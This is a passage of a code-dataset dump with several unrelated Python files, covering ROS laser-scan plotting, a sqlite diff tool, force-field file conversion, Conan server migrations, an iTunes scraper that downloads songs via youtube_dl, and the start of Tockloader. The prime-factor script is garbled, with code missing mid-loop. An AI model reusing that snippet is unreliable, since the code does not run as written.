return cv2.cvtColor(self.imread(), dst)\n else:\n return cv2.cuda.cvtColor(self.download(), dst)\n\n def rgb_2_gray(self):\n return self.cvtColor(cv2.COLOR_BGR2GRAY)","sub_path":"baseImage/base_image.py","file_name":"base_image.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230287159","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\nimport copy \n\nimport matplotlib.pyplot as plt\nimport laser_geometry.laser_geometry as lg\nimport sensor_msgs.point_cloud2 as pc2\n\nfrom sensor_msgs.msg import PointCloud2\nfrom sensor_msgs.msg import LaserScan\n\nlp = lg.LaserProjection()\nscanner_readings_x = []\nscanner_readings_y = []\n\ndef scanCallBack(ros_data):\n global scanner_readings_x\n global scanner_readings_y\n scanner_readings_x = []\n scanner_readings_y = []\n\n pc2_msg = lp.projectLaser(ros_data)\n point_generator = pc2.read_points(pc2_msg)\n\n for point in point_generator:\n scanner_readings_x.append(point[0])\n scanner_readings_y.append(point[1])\n\n\n\n\nif __name__==\"__main__\":\n \n global scanner_readings_x\n global scanner_readings_y\n\n # Start the ros node\n rospy.init_node('scaner_vishulizer')\n\n # Subscribers and publishers\n subscriber = rospy.Subscriber('/scan', LaserScan, scanCallBack)\n \n # Setting the rate\n set_rate = 5\n rate = rospy.Rate(set_rate)\n\n while not rospy.is_shutdown():\n\n scan_x = copy.deepcopy(scanner_readings_x)\n scan_y = copy.deepcopy(scanner_readings_y)\n\n if (len(scan_x) == len(scan_y)):\n print(len(scan_x))\n print(len(scan_y))\n print(\"------------------------\")\n # Plot the trust\n plt.clf()\n plt.ylim((-4,4))\n plt.xlim((-4,4))\n plt.ylabel('Position Y')\n plt.xlabel('Position X')\n plt.scatter(scan_x,scan_y)\n plt.pause(0.000001)\n\n # Sleep\n rate.sleep()","sub_path":"ros_ws/src/robot_drive/src/laser_scan_vis.py","file_name":"laser_scan_vis.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"451974428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Diff entries from two sqlite3 db\nimport os\nimport sqlite3\nimport sys\n\ndef get_entries(db_name):\n db = sqlite3.connect(db_name)\n cur = db.cursor()\n cur.execute(\"SELECT name, type, path from searchIndex\")\n entries = cur.fetchall()\n db.commit()\n db.close()\n return set(entries)\n\ndef diff(old, new):\n add = new - old\n rem = old - new\n print(\"Added: %d\" % len(add))\n print_merged_entries(add)\n print(\"Removed: %d\" % len(rem))\n print_merged_entries(rem)\n\ndef print_merged_entries(entries):\n if len(entries) == 0:\n return\n entries = sorted(entries, key=lambda x: x[2])\n entries_in_previous_doc = []\n current_doc = entries[0][2].split('#')[0]\n start = 0\n for i in range(0, len(entries)):\n doc_name, _ = entries[i][2].split('#')\n if doc_name != current_doc:\n entries_in_previous_doc = entries[start:i]\n start = i\n print(\"%s: %d\" % (\n os.path.splitext(current_doc)[0], len(entries_in_previous_doc)))\n for e in entries_in_previous_doc:\n print('\\t%s' % e[0])\n print('')\n current_doc = doc_name\n entries_in_previous_doc = entries[start:]\n print(\"%s: %d\" % (\n os.path.splitext(current_doc)[0], len(entries_in_previous_doc)))\n for e in entries_in_previous_doc:\n print('\\t%s' % e[0])\n print('')\n\nif __name__ == '__main__':\n argc = len(sys.argv)\n if argc == 3:\n old = get_entries(sys.argv[1])\n new = get_entries(sys.argv[2])\n diff(old, new)\n elif argc == 2:\n entries = get_entries(sys.argv[1])\n diff(set(), entries)\n else:\n print(\"Diff entries with given sqlite3 db\")\n print(\"Usage: %s [old_sqlite.db] new_sqlite.db\")\n","sub_path":"dash/diff_entries.py","file_name":"diff_entries.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"436365081","text":"import math\r\ndef isPrime(n):\r\n flag=0\r\n i=2;\r\n while imax):\r\n max=i\r\n if(isPrime(n//i)):\r\n print(\"prime/\"+(str)(n//i))\r\n if(n//i>max):\r\n max=n//i\r\n \r\n i=i+1\r\nprint(max)\r\n\r\n\r\n\r\n \r\n\r\n \r\n","sub_path":"largestPrime.py","file_name":"largestPrime.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"31766518","text":"\"\"\"\nSCRIPT TO WRITE CHARMM RTF AND PRM FILES \nFROM BOSS ZMATRIX\nCreated on Mon Feb 15 15:40:05 2016\n@author: Leela S. Dodda leela.dodda@yale.edu\n@author: William L. Jorgensen Lab \n\nREQUIREMENTS:\nBOSS (need to set BOSSdir in bashrc and cshrc)\nPreferably Anaconda python with following modules\npandas \nargparse\nnumpy\n\"\"\"\n\nfrom LigParGen.BOSSReader import bossPdbAtom2Element,bossElement2Mass,ucomb\nimport pickle\nimport pandas as pd\nimport numpy as np\n\n\ndef retDihedImp(df):\n odihed = []\n if np.sum([df['V' + str(pot)] for pot in range(1, 5)]) != 0.0:\n for pot in range(1, 5):\n if (df['V' + str(pot)] != 0.0):\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n else:\n pot = 2\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n return (odihed)\n\n\ndef retDihed(df):\n odihed = []\n for pot in range(1, 5):\n odihed.append('%s %4.5f %d %4.5f \\n' % (df['NAME'].replace(\n \"-\", \" \"), df['V' + str(pot)], pot, 180.00 * abs(pot % 2 - 1)))\n return (odihed)\n\n\ndef Boss2CharmmRTF(num2typ2symb, Qs, resid, bnd_df, imps):\n charges = [float(Qs[i][1]) for i in range(len(Qs))]\n rtf = open(resid + '.rtf', 'w+')\n rtf.write('! generated RTF file for NAMD/CHARMM \\n! Written by Leela S. Dodda (leela.dodda@yale.edu)\\n')\n Mass = ['MASS %d %s %3.4f %s \\n' % ((i + 1), num2typ2symb[i][2], bossElement2Mass(\n bossPdbAtom2Element(num2typ2symb[i][0])), bossPdbAtom2Element(num2typ2symb[i][0])) for i in range(len(Qs))]\n for i in range(len(Mass)):\n rtf.write('%s' % Mass[i])\n rtf.write('AUTO ANGLES DIHE \\n')\n rtf.write('RESI %5s %3.3f \\n' % (resid, sum(charges)))\n for i in range(len(Qs)):\n rtf.write('ATOM %s %s %s \\n' % (num2typ2symb[i][0], bossPdbAtom2Element(\n num2typ2symb[i][0]) + num2typ2symb[i][1][-3:], Qs[i][1]))\n for (x, y) in zip(bnd_df.cl1, bnd_df.cl2):\n rtf.write('BOND %s %s \\n' % (num2typ2symb[x][0], num2typ2symb[y][0]))\n for i in imps:\n rtf.write('IMPR %s \\n' % (i.replace(\"-\", \" \")))\n rtf.write('PATCH FIRST NONE LAST NONE \\n')\n rtf.write('END \\n')\n rtf.close()\n return None\n\n\ndef Boss2CharmmPRM(resid, num2typ2symb, Qs, bnd_df, ang_df, tor_df):\n #### COLLECTING NONBONDING PART #######\n prm = open(resid + '.prm', 'w+')\n prm.write('! generated PRM file for NAMD/CHARMM \\n')\n prm.write('\\nBOND \\n')\n for i in bnd_df.index:\n prm.write('%s %s %4.3f %4.3f \\n' % (num2typ2symb[bnd_df.cl1[i]][\n 2], num2typ2symb[bnd_df.cl2[i]][2], bnd_df.KIJ[i], bnd_df.RIJ[i]))\n prm.write('\\nANGLE \\n')\n for i in ang_df.index:\n prm.write('%s %s %s %4.3f %4.3f \\n' % (num2typ2symb[ang_df.cl1[i]][2], num2typ2symb[\n ang_df.cl2[i]][2], num2typ2symb[ang_df.cl3[i]][2], ang_df.K[i], ang_df.R[i]))\n prm.write('\\nDIHEDRAL \\n')\n if len(tor_df.index) > 0:\n tor_df = tor_df.drop_duplicates(['NAME', 'TY'])\n pro_df = tor_df[tor_df.TY == 'Proper']\n for i in list(pro_df.index):\n ndf = pro_df.iloc[i]\n pro_out = retDihed(ndf.to_dict())\n for i in range(4):\n prm.write('%s' % pro_out[i])\n prm.write(\n 'X X X X 0.00000 1 0.000000 ! WILD CARD FOR MISSING TORSION PARAMETERS\\n')\n prm.write('\\nIMPROPER \\n')\n imp_df = tor_df[tor_df.TY == 'Improper']\n for i in list(imp_df.index):\n ndf = tor_df.iloc[i]\n imp_out = retDihedImp(ndf.to_dict())\n for i in range(len(imp_out)):\n prm.write('%s' % imp_out[i])\n prm.write(\n 'X X X X 0.00000 1 0.000000 ! 
WILD CARD FOR MISSING IMPROPER PARAMETERS \\n')\n prm.write(\n '\\nNONBONDED nbxmod 5 atom cdiel switch vatom vdistance vswitch - \\ncutnb 14.0 ctofnb 12.0 ctonnb 11.5 eps 1.0 e14fac 0.5 geom\\n')\n Qlines = ['%s 0.00 %3.6f %3.6f 0.00 %3.6f %3.6f \\n' %\n (num2typ2symb[i][2], float(Qs[i][3]) * -1.00, float(Qs[i][2]) * 0.561231, float(Qs[i][3]) * -0.50,\n float(Qs[i][2]) * 0.561231) for i in range(len(Qs))]\n for i in range(len(Qlines)):\n prm.write('%s' % Qlines[i])\n prm.close()\n return None\n\n\ndef Boss2CharmmTorsion(bnd_df, num2opls, st_no, molecule_data, num2typ2symb):\n dhd = []\n for line in molecule_data.MolData['TORSIONS']:\n dt = [float(l) for l in line]\n dhd.append(dt)\n dhd = np.array(dhd)\n dhd = dhd # kcal to kj conversion\n dhd = dhd / 2.0 # Komm = Vopls/2\n dhd_df = pd.DataFrame(dhd, columns=['V1', 'V2', 'V3', 'V4'])\n ats = []\n for line in molecule_data.MolData['ATOMS'][3:]:\n dt = [line.split()[0], line.split()[4],\n line.split()[6], line.split()[8]]\n dt = [int(d) for d in dt]\n ats.append(dt)\n for line in molecule_data.MolData['ADD_DIHED']:\n dt = [int(l) for l in line]\n ats.append(dt)\n assert len(ats) == len(\n dhd), 'Number of Dihedral angles in Zmatrix and Out file dont match'\n ats = np.array(ats) - st_no\n for i in range(len(ats)):\n for j in range(len(ats[0])):\n if ats[i][j] < 0:\n ats[i][j] = 0\n at_df = pd.DataFrame(ats, columns=['I', 'J', 'K', 'L'])\n final_df = pd.concat([dhd_df, at_df], axis=1)\n final_df = final_df.reindex(at_df.index)\n bndlist = list(bnd_df.UR) + (list(bnd_df.UR))\n final_df['TY'] = ['Proper' if ucomb(list([final_df.I[n], final_df.J[n], final_df.K[\n n], final_df.L[n]]), bndlist) == 3 else 'Improper' for n in range(len(final_df.I))]\n final_df['TI'] = [num2typ2symb[j][2] for j in final_df.I]\n final_df['TJ'] = [num2typ2symb[j][2] for j in final_df.J]\n final_df['TK'] = [num2typ2symb[j][2] for j in final_df.K]\n final_df['TL'] = [num2typ2symb[j][2] for j in final_df.L]\n final_df['SYMB'] = ['-'.join([num2typ2symb[final_df.I[i]][0], num2typ2symb[final_df.J[i]][\n 0], num2typ2symb[final_df.K[i]][0], num2typ2symb[final_df.L[i]][0]]) for i in final_df.index]\n if len(final_df.index) > 0:\n final_df['NAME'] = final_df.TI + '-' + final_df.TJ + \\\n '-' + final_df.TK + '-' + final_df.TL\n return final_df\n\n\ndef boss2CharmmBond(molecule_data, st_no):\n bdat = molecule_data.MolData['BONDS']\n bdat['cl1'] = [x - st_no if not x - st_no < 0 else 0 for x in bdat['cl1']]\n bdat['cl2'] = [x - st_no if not x - st_no < 0 else 0 for x in bdat['cl2']]\n bnd_df = pd.DataFrame(bdat)\n bnd_df['UF'] = ((bnd_df.cl1 + bnd_df.cl2) *\n (bnd_df.cl1 + bnd_df.cl2 + 1) * 0.5) + bnd_df.cl2\n bnd_df['UR'] = ((bnd_df.cl1 + bnd_df.cl2) *\n (bnd_df.cl1 + bnd_df.cl2 + 1) * 0.5) + bnd_df.cl1\n hb_df = bnd_df.drop(['cl1', 'cl2', 'UF', 'UR'], 1)\n hb_df = hb_df.drop_duplicates()\n return bnd_df\n\n\ndef boss2CharmmAngle(anglefile, num2opls, st_no):\n adat = anglefile\n adat['cl1'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl1']]\n adat['cl2'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl2']]\n adat['cl3'] = [x - st_no if not x - st_no < 0 else 0 for x in adat['cl3']]\n ang_df = pd.DataFrame(adat)\n ang_df = ang_df[ang_df.K > 0]\n ang_df['TY'] = np.array([num2opls[i] + '-' + num2opls[j] + '-' + num2opls[k]\n for i, j, k in zip(ang_df.cl1, ang_df.cl2, ang_df.cl3)])\n return ang_df\n\n\ndef bossData(molecule_data):\n ats_file = molecule_data.MolData['ATOMS']\n types = []\n for i in enumerate(ats_file):\n types.append([i[1].split()[1], 'opls_' + 
i[1].split()[2]])\n st_no = 3\n Qs = molecule_data.MolData['Q_LJ']\n assert len(Qs) == len(types), 'Please check the at_info and Q_LJ_dat files'\n num2opls = {}\n for i in range(0, len(types)):\n num2opls[i] = Qs[i][0]\n num2typ2symb = {i: types[i] for i in range(len(Qs))}\n for i in range(len(Qs)):\n num2typ2symb[i].append(bossPdbAtom2Element(\n num2typ2symb[i][0]) + num2typ2symb[i][1][-3:])\n num2typ2symb[i].append(bossPdbAtom2Element(num2typ2symb[i][0]))\n num2typ2symb[i].append(bossElement2Mass(num2typ2symb[i][3]))\n num2typ2symb[i].append(Qs[i][0])\n return (types, Qs, num2opls, st_no, num2typ2symb)\n\n\ndef Boss2Charmm(resid, molecule_data):\n types, Qs, num2opls, st_no, num2typ2symb = bossData(molecule_data)\n bnd_df = boss2CharmmBond(molecule_data, st_no)\n ang_df = boss2CharmmAngle(molecule_data.MolData['ANGLES'], num2opls, st_no)\n tor_df = Boss2CharmmTorsion(bnd_df, num2opls, st_no,\n molecule_data, num2typ2symb)\n Boss2CharmmRTF(num2typ2symb, Qs, resid, bnd_df, list(\n tor_df[tor_df.TY == 'Improper']['SYMB']))\n Boss2CharmmPRM(resid, num2typ2symb, Qs, bnd_df, ang_df, tor_df)\n return None\n\n\ndef mainBOSS2CHARMM(resid, clu=False):\n mol = pickle.load(open(resid + \".p\", \"rb\"))\n Boss2Charmm(resid, mol)\n return None\n","sub_path":"LigParGen/BOSS2CHARMM.py","file_name":"BOSS2CHARMM.py","file_ext":"py","file_size_in_byte":8955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52632465","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nmusic = pd.read_csv(\"featuresdf.csv\")\n\n# Get artists and song names for tracks with danceability scores over 0.8 and loudness scores below 5.0.\nplaylist = [(track, artist, dance, vol) for track, artist, dance, vol\n in zip(music.name, music.artists, music.danceability, music.loudness)\n if dance > 0.8 and vol < 5.0]\n\n# Sort tracks in decending order of danceability score, so most danceable tracks are on top.\npretty_playlist = sorted(playlist, key=lambda x: x[2], reverse=True)\n\n# Print top 5 tracks\nfor song in pretty_playlist[:5]:\n print(song)\n","sub_path":"Student/briadean/lesson01/comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"213049956","text":"import os\nimport shutil\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.migrations import Migrator\nfrom conans.model.version import Version\nfrom conans.paths import PACKAGES_FOLDER\nfrom conans.server.revision_list import RevisionList\nfrom conans.server.store.server_store import REVISIONS_FILE\nfrom conans.util.files import list_folder_subdirs, mkdir, rmdir, save\nfrom conans.util.log import logger\n\n\nclass ServerMigrator(Migrator):\n\n def __init__(self, conf_path, store_path, current_version, out, force_migrations):\n self.force_migrations = force_migrations\n super(ServerMigrator, self).__init__(conf_path, store_path, current_version, out)\n\n def _make_migrations(self, old_version):\n # ############### FILL THIS METHOD WITH THE REQUIRED ACTIONS ##############\n\n # VERSION 0.1\n if old_version == Version(\"0.1\"):\n # Remove config, conans, all!\n self.out.warn(\"Reseting configuration and storage files...\")\n if self.conf_path:\n rmdir(self.conf_path)\n if self.store_path:\n rmdir(self.store_path)\n\n if old_version < Version(\"1.10.0\"):\n if not os.path.exists(self.store_path) or not os.listdir(self.store_path):\n # Empty storage\n return\n try:\n self.migrate_to_revisions_layout()\n except Exception as e:\n print(\"An error ocurred during the migration, please restore the backup directory \"\n \"and try again\")\n print(e)\n exit(1)\n\n # ########################################################################\n\n def migrate_to_revisions_layout(self):\n # .conan/data/lib/1.0/user/channel/export/*\n # .conan/data/lib/1.0/user/channel/0/export/*\n\n # .conan/data/lib/1.0/user/channel/package/*\n # .conan/data/lib/1.0/user/channel/0/package/*\n\n # .conan/data/lib/1.0/user/channel/package/XXX/*\n # .conan/data/lib/1.0/user/channel/0/package/XXX/0/*\n if not self.force_migrations:\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* ERROR: STORAGE MIGRATION NEEDED! 
*\")\n print(\"* *\")\n print(\"**********************************************\")\n msg = \"A migration of your storage is needed, please backup first the storage \" \\\n \"directory and run:\\n\\n$ conan_server --migrate\\n\\n\"\n logger.error(msg)\n print(msg)\n exit(3) # Gunicorn expects error code 3 to stop retrying booting the worker\n\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* MIGRATION IN PROGRESS *\")\n print(\"* *\")\n print(\"**********************************************\")\n subdirs = list_folder_subdirs(basedir=self.store_path, level=4)\n for subdir in subdirs:\n base_dir = os.path.join(self.store_path, subdir)\n for export_or_package in os.listdir(base_dir):\n the_dir = os.path.join(base_dir, export_or_package)\n dest_dir = os.path.join(base_dir, DEFAULT_REVISION_V1)\n mkdir(dest_dir)\n print(\"Moving '%s': %s\" % (subdir, export_or_package))\n shutil.move(the_dir, dest_dir)\n\n rev_list = RevisionList()\n rev_list.add_revision(DEFAULT_REVISION_V1)\n save(os.path.join(base_dir, REVISIONS_FILE), rev_list.dumps())\n\n packages_dir = os.path.join(self.store_path, subdir, DEFAULT_REVISION_V1,\n PACKAGES_FOLDER)\n\n if not os.path.exists(packages_dir):\n print(\"NO PACKAGES\")\n continue\n for pid in os.listdir(packages_dir):\n package_dir = os.path.join(packages_dir, pid)\n mkdir(os.path.join(package_dir, DEFAULT_REVISION_V1))\n print(\" - Package '%s'\" % pid)\n for item in os.listdir(package_dir):\n if item == DEFAULT_REVISION_V1:\n continue\n origin_path = os.path.join(package_dir, item)\n dest_path = os.path.join(package_dir, DEFAULT_REVISION_V1, item)\n mkdir(dest_dir)\n shutil.move(origin_path, dest_path)\n rev_list = RevisionList()\n rev_list.add_revision(DEFAULT_REVISION_V1)\n save(os.path.join(package_dir, REVISIONS_FILE), rev_list.dumps())\n print(\"**********************************************\")\n print(\"* *\")\n print(\"* MIGRATION COMPLETED! *\")\n print(\"* *\")\n print(\"**********************************************\")\n","sub_path":"conans/server/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"156060872","text":"#!/usr/bin/env python3\n# coding:utf-8\n\nss = {}\nn = int(input())\nfor i in range(n):\n s = input()\n if s in ss:\n ss[s] += 1\n else:\n ss[s] = 1\nprint(max(ss, key=ss.get))\n","sub_path":"atcoder/ABC/008/abc08b.py","file_name":"abc08b.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"424404694","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom youtube_dl import YoutubeDL\nimport pyexcel\n\n\n#Part 1:\nurl = \"https://www.apple.com/itunes/charts/songs/\"\n\n# Running once to open and read url\nconn = urlopen(url)\n\ncontent = conn.read().decode('utf-8')\n\nsoup = BeautifulSoup(content, 'html.parser')\n\ndiv_list = soup.find_all(name = 'div', attrs= {'section-content'})\n\nul = div_list[1].ul\nsong_list = ul.find_all('li')\n\nsong_dic = []\n\nfor song in song_list:\n name = song.h3.a.string\n artist = song.h4.a.string\n dic = {}\n dic['name'] = name\n dic['artist'] = artist\n song_dic.append(dic)\n\npyexcel.save_as(records = song_dic, dest_file_name = 'List_of_songs.xlsx')\n\n#Part 2:\n\nfor song in song_dic:\n options = {\n 'format' : 'bestaudio/audio',\n 'default_search' : 'ytsearch',\n 'max_downloads' : 1\n}\n\n dl = YoutubeDL(options)\n dl.download([song['name'] + ' ' + song['artist']])\n\n","sub_path":"Lab02/HW/itunes_ex.py","file_name":"itunes_ex.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"434680458","text":"#!/usr/bin/env python3\n\nimport argparse\nimport atexit\nimport binascii\nimport contextlib\nimport glob\nimport json\nimport os\nimport struct\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nimport time\n\nimport argcomplete\nimport colorama\nimport crcmod\nimport pytoml\nimport serial\nimport serial.tools.list_ports\nimport serial.tools.miniterm\n\nfrom ._version import __version__\n\n\n################################################################################\n## Niceties and Support\n################################################################################\n\nfrom serial.tools import list_ports_common\n\ndef set_terminal_title(title):\n\tprint(colorama.ansi.set_title(title))\n\ndef set_terminal_title_from_port_info(info):\n\textras = ['Tockloader']\n\tif info.manufacturer and info.manufacturer != 'n/a':\n\t\textras.append(info.manufacturer)\n\tif info.name and info.name != 'n/a':\n\t\textras.append(info.name)\n\tif info.description and info.description != 'n/a':\n\t\textras.append(info.description)\n\t#if info.hwid and info.hwid != 'n/a':\n\t#\textras.append(info.hwid)\n\tif info.product and info.product != 'n/a':\n\t\tif info.product != info.description:\n\t\t\textras.append(info.product)\n\ttitle = ' : '.join(extras)\n\n\tset_terminal_title(title)\n\ndef set_terminal_title_from_port(port):\n\tset_terminal_title('Tockloader : ' + port)\n\n# Cleanup any title the program may set\natexit.register(set_terminal_title, '')\n\ndef menu(options, *,\n\t\treturn_type,\n\t\tdefault_index=0,\n\t\tprompt='Which option? '\n\t\t):\n\t'''Present a menu of choices to a user\n\n\t`options` should be a like-list object whose iterated objects can be coerced\n\tinto strings.\n\n\t`return_type` must be set to one of\n\t - \"index\" - for the index into the options array\n\t - \"value\" - for the option value chosen\n\n\t`default_index` is the index to present as the default value (what happens\n\tif the user simply presses enter). 
Passing `None` disables default\n\tselection.\n\t'''\n\tprint()\n\tfor i,opt in enumerate(options):\n\t\tprint('[{}]\\t{}'.format(i, opt))\n\tif default_index is not None:\n\t\tprompt += '[{}] '.format(default_index)\n\tprint()\n\n\tresp = input(prompt)\n\tif resp == '':\n\t\tresp = default_index\n\telse:\n\t\ttry:\n\t\t\tresp = int(resp)\n\t\t\tif resp < 0 or resp >= len(options):\n\t\t\t\traise ValueError\n\t\texcept:\n\t\t\treturn menu(options, return_type=return_type,\n\t\t\t\t\tdefault_index=default_index, prompt=prompt)\n\n\tif return_type == 'index':\n\t\treturn resp\n\telif return_type == 'value':\n\t\treturn options[resp]\n\telse:\n\t\traise NotImplementedError('Menu caller asked for bad return_type')\n\nclass TockLoaderException(Exception):\n\tpass\n\n################################################################################\n## Main TockLoader Interface\n################################################################################\n\nclass TockLoader:\n\n\tdef __init__ (self, args):\n\t\tself.args = args\n\n\t\t# Get an object that allows talking to the board\n\t\tif hasattr(self.args, 'jtag') and self.args.jtag:\n\t\t\tself.channel = JLinkExe(args)\n\t\telse:\n\t\t\tself.channel = BootloaderSerial(args)\n\n\n\t# Open the correct channel to talk to the board.\n\t#\n\t# For the bootloader, this means opening a serial port.\n\t# For JTAG, not much needs to be done.\n\tdef open (self, args):\n\t\tself.channel.open_link_to_board()\n\n\n\t# Tell the bootloader to save the binary blob to an address in internal\n\t# flash.\n\t#\n\t# This will pad the binary as needed, so don't worry about the binary being\n\t# a certain length.\n\tdef flash_binary (self, binary, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\t\t\tself.channel.flash_binary(address, binary)\n\n\n\t# Run miniterm for receiving data from the board.\n\tdef run_terminal (self):\n\t\tprint('Listening for serial output.')\n\n\t\t# Use trusty miniterm\n\t\tminiterm = serial.tools.miniterm.Miniterm(\n\t\t\tself.channel.get_serial_port(),\n\t\t\techo=False,\n\t\t\teol='crlf',\n\t\t\tfilters=['default'])\n\n\t\t# Ctrl+c to exit.\n\t\tminiterm.exit_character = serial.tools.miniterm.unichr(0x03)\n\t\tminiterm.set_rx_encoding('UTF-8')\n\t\tminiterm.set_tx_encoding('UTF-8')\n\n\t\tminiterm.start()\n\t\ttry:\n\t\t\tminiterm.join(True)\n\t\texcept KeyboardInterrupt:\n\t\t\tpass\n\t\tminiterm.join()\n\t\tminiterm.close()\n\n\n\t# Query the chip's flash to determine which apps are installed.\n\tdef list_apps (self, address, verbose, quiet):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Get all apps based on their header\n\t\t\tapps = self._extract_all_app_headers(address)\n\n\t\t\tself._print_apps(apps, verbose, quiet)\n\n\n\t# Add or update TABs on the board.\n\t#\n\t# `replace` can be either \"yes\", \"no\", or \"only\"\n\tdef install (self, tabs, address, replace='yes'):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Start with the apps we are searching for.\n\t\t\treplacement_apps = self._extract_apps_from_tabs(tabs)\n\n\t\t\t# Get a list of installed apps\n\t\t\texisting_apps = self._extract_all_app_headers(address)\n\n\t\t\t# What apps we want after this command completes\n\t\t\tresulting_apps = []\n\n\t\t\t# Whether we actually made a change or not\n\t\t\tchanged = False\n\n\t\t\t# Check to see if this app is in there\n\t\t\tif 
replace == 'yes' or replace == 'only':\n\t\t\t\tfor existing_app in existing_apps:\n\t\t\t\t\tfor replacement_app in replacement_apps:\n\t\t\t\t\t\tif existing_app['name'] == replacement_app['name']:\n\t\t\t\t\t\t\tresulting_apps.append(replacement_app)\n\t\t\t\t\t\t\tchanged = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\t# We did not find a replacement app. That means we want\n\t\t\t\t\t\t# to keep the original.\n\t\t\t\t\t\tresulting_apps.append(existing_app)\n\n\t\t\t\t# Now, if we want a true install, and not an update, make sure\n\t\t\t\t# we add all apps that did not find a replacement on the board.\n\t\t\t\tif replace == 'yes':\n\t\t\t\t\tfor replacement_app in replacement_apps:\n\t\t\t\t\t\tfor resulting_app in resulting_apps:\n\t\t\t\t\t\t\tif replacement_app['name'] == resulting_app['name']:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# We did not find the name in the resulting apps.\n\t\t\t\t\t\t\t# Add it.\n\t\t\t\t\t\t\tresulting_apps.append(replacement_app)\n\t\t\t\t\t\t\tchanged = True\n\n\t\t\telif replace == 'no':\n\t\t\t\t# Just add the apps\n\t\t\t\tresulting_apps = existing_apps + replacement_apps\n\t\t\t\tchanged = True\n\n\t\t\tif changed:\n\t\t\t\t# Since something is now different, update all of the apps\n\t\t\t\tself._reshuffle_apps(address, resulting_apps)\n\t\t\telse:\n\t\t\t\t# Nothing changed, so we can raise an error\n\t\t\t\traise TockLoaderException('Nothing found to update')\n\n\n\t# If an app by this name exists, remove it from the chip\n\tdef uninstall_app (self, app_names, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Get a list of installed apps\n\t\t\tapps = self._extract_all_app_headers(address)\n\n\t\t\t# Remove the apps if they are there\n\t\t\tremoved = False\n\t\t\tkeep_apps = []\n\t\t\tfor app in apps:\n\t\t\t\tif app['name'] not in app_names:\n\t\t\t\t\tkeep_apps.append(app)\n\t\t\t\telse:\n\t\t\t\t\tremoved = True\n\n\t\t\t# Now take the remaining apps and make sure they\n\t\t\t# are on the board properly.\n\t\t\tself._reshuffle_apps(address, keep_apps)\n\n\t\t\tif not removed:\n\t\t\t\traise TockLoaderException('Could not find any apps on the board to remove.')\n\n\n\t# Erase flash where apps go\n\tdef erase_apps (self, address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Then erase the next page. This ensures that flash is clean at the\n\t\t\t# end of the installed apps and makes things nicer for future uses of\n\t\t\t# this script.\n\t\t\tself.channel.erase_page(address)\n\n\n\t# Download all attributes stored on the board\n\tdef list_attributes (self):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\tself._print_attributes(self.channel.get_all_attributes())\n\n\n\t# Download all attributes stored on the board\n\tdef set_attribute (self, key, value):\n\t\t# Do some checking\n\t\tif len(key.encode('utf-8')) > 8:\n\t\t\traise TockLoaderException('Key is too long. Must be 8 bytes or fewer.')\n\t\tif len(value.encode('utf-8')) > 55:\n\t\t\traise TockLoaderException('Value is too long. 
